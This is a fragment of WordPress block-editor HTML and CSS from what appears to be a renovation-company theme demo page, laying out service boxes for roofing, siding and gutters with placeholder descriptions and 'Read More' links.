.skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1ffec91c-571f-4f8d-8a96-dfaaa2396c35\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"63f5950b-52ef-4a1c-9ba6-6d31c39a0099\"} -->\n<style type=\"text/css\"> .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-63f5950b-52ef-4a1c-9ba6-6d31c39a0099 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"a8857585-f5a3-459a-b961-df91f3cd9872\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-a8857585-f5a3-459a-b961-df91f3cd9872 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a8857585-f5a3-459a-b961-df91f3cd9872 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a8857585-f5a3-459a-b961-df91f3cd9872 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-a8857585-f5a3-459a-b961-df91f3cd9872 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a8857585-f5a3-459a-b961-df91f3cd9872 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a8857585-f5a3-459a-b961-df91f3cd9872\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"770e7492-0a5e-43a0-b0e1-b7143d9a2fff\"} -->\n<style type=\"text/css\"> .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-770e7492-0a5e-43a0-b0e1-b7143d9a2fff skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"915b20fa-e80d-4726-baa6-3a3806cd737a\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-915b20fa-e80d-4726-baa6-3a3806cd737a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-915b20fa-e80d-4726-baa6-3a3806cd737a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-915b20fa-e80d-4726-baa6-3a3806cd737a .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-915b20fa-e80d-4726-baa6-3a3806cd737a .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-915b20fa-e80d-4726-baa6-3a3806cd737a .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-915b20fa-e80d-4726-baa6-3a3806cd737a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"e99ff43e-a1db-48f8-9a44-3ec14b42b651\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e99ff43e-a1db-48f8-9a44-3ec14b42b651 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"e1673c00-5d5a-4019-bacc-53f6b5a968d4\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-e1673c00-5d5a-4019-bacc-53f6b5a968d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n 